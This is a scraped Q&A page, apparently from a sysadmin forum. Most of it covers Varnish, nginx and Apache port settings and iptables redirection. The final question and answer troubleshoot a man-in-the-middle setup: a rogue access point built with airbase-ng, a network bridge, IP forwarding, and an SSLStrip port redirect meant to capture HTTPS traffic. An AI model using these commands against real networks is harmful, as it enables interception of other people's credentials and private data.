I am running the following setup:
Magento 1.9.3.1
Varnish 3.0.5-2 - package installed from here https://www.magentocommerce.com/magento-connect/turpentine-varnish-cache.html
Ubuntu 14.04
Plesk 17.0.17
I have installed both varnish on the server and the plugin within magento, saved the configuration properly (from magento admin), however I am missing a configuration setting somewhere since the Varnish headers do not show up.
/etc/default/varnish has the following content:
DAEMON_OPTS="-a :443 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,8192m\
-p esi_syntax=0x2\
-p cli_buffer=16384"
I did set it up to listen on 443 because the website has a ssl certificate.
When I try to see who is listening 443 with netstat -ntlp | grep -w 443 I get the following response:
tcp 0 0 91.250.103.173:443 0.0.0.0:* LISTEN 9171/nginx: worker
tcp6 0 0 :::443 :::* LISTEN 6109/varnishd
So in addition to this I tried to modify the port where nginx listens by setting the listening port to 444 like this listen 444 ssl;. It did not work.
When I try to see the headers with curl there is no X-Varnish header.
What am I missing?
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,8192m\
-p esi_syntax=0x2\
-p cli_buffer=16384"
you should change port listen to nginx or apache to 8080
and config default.vcl change port backend 8080
Related
I have a ec2 instance with centos and a tomcat server running on it on port 8080.
My security group has an open port for HTTPS (443)
For the redirection I've added the following iptables rules:
iptables -A INPUT -i eth0 -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --dport 8443 -j ACCEPT
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-ports 8443
sudo iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8443
Now i can connect from my instance to port 443 and get redirected to port 8443.
https://localhost
https://54.247.86.18 (elastic ip)
But from external this doesn't work. If I connect to https://54.247.86.18 from browser I get an no server found error.
Any ideas how to resolve it?
I created a bash script to switch between using Apache and Varnish
But the commands of restarting the httpd service not working RECENTLY
the script was working fine before months
#!/bin/bash
echo "Switching between Apache and Varnish cache"
if grep -Fxq "apache_port=0.0.0.0:80" /var/cpanel/cpanel.config
then
sed -i '/apache_port/c\apache_port=0.0.0.0:8080' /var/cpanel/cpanel.config
else
sed -i '/apache_port/c\apache_port=0.0.0.0:80' /var/cpanel/cpanel.config
fi
/usr/local/cpanel/whostmgr/bin/whostmgr2 –updatetweaksettings &&
/scripts/rebuildhttpdconf &&
service httpd restart &&
service varnish restart &&
echo "Done"
I don't know Why the restarting oof httpd is not working exactly
What about to use iptables port redirection instead?
Basically, you have your varnish and apache running on their own unprivileged ports concurrently and redirect all traffic to port 80 to varnish or apache on kernel level.
Let run varnish on 0.0.0.0:6081 and apache on 0.0.0.0:8080 and play with these 2 command sets (under root or sudo):
To switch traffic to apache (assuming we have already it directed to varnish):
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 && \
iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 6081
# first command adds rule to redirect all traffic on interface eth0 (adjust as needed) from port 80 to port 8080, rule is added to the end of rules list, so already active rule redirecting traffic to 6081 is still in charge with higher priority
# second line deletes rule redirecting traffic from port 80 to port 6081, to new rule can come into effect. moreover, it's executed only if previous command (-A) was finished successfully.
To switch it back to varnish:
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 6081
iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
# inverted rules from above, adds redirection to 6081 and removes redirection to 8080 if addition was successful
Pros:
No varnish restarts, so no cold cache.
No port 80 outage overall if you first add the new redirection rule and then delete still valid older one.
Much safer, if addition of the first rule fails, skip deleting still valid rule and report problem. You are still running as before failed attempt. Just play with scripts as needed.
Cons:
No cache eviction as there is no varnish restart. But I guess this is not the reason you try to switch traffic to apache. And you can evict varnish separately if you need afterall. :)
I have been trying this since yesterday but no success. I have debian 8, nginx and varnish 4.0.2
I want to update varnish cli_buffer value from 8k to 16k. Following is my /etc/varnish/default.vcl configuration.
default.vcl
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-p cli_buffer=16384 \
-p feature=+esi_ignore_other_elements \
-p vcc_allow_inline_c=on \
-s malloc,256m"
I'm lost where to update now. Any suggestions ? Thanks in advance.
What you are showing is the Varnish daemon options for the file /etc/default/varnish but you seem to have put that information in the /etc/varnish/default.vcl which will not work. The default.vcl file is for the Varnish configuration (not the daemon startup).
I would like to know how to start Varnish instance with "-p cli_buffer 10000".
is the following command right way ?
service varnish reload -p cli_buffer=10000
You can put this in /etc/default/varnish configuration file
As mentioned before, Place this in your config-file instead. The config is placed at /etc/default/varnish on ubuntu
DAEMON_OPTS="-a :80 \
-T :6083 \
-f /etc/varnish/default.vcl \
-n varnish \
-s malloc,5G \
-p esi_syntax=0x1 \
-p cli_buffer=10000"
I am having trouble with SSLStrip in a MITM Setup with Backtrack 5. I am using an external wireless card to broadcast the wireless signal, and routing through an Ethernet. I am successfully viewing the packets in Wireshark, however I would like to view SSL data using SSLStrip. These are the preliminary commands I use to set up MITM.
airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0
--new Terminal--
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward
At this point, I can view packet data in WireShark. I follow these steps to set up SSLStrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080
When I am finished with the session and I open sslstrip.log I do not see any data written to the file. Also, I am unable to access the internet once I do the iptables redirect. Please let me know what you think the problem might be.
Assuming sslstrip and arp poisoning are up and running you have a problem with port redirection.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
redirects http traffic to 127.0.0.1 port 666.
cd /pentest/web/sslstrip
sslstrip -l 8080
starts sslstrip listening for incoming traffic on port 8080
U can either change port redirection to 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
or change the listening port to 666
sslstrip -l 666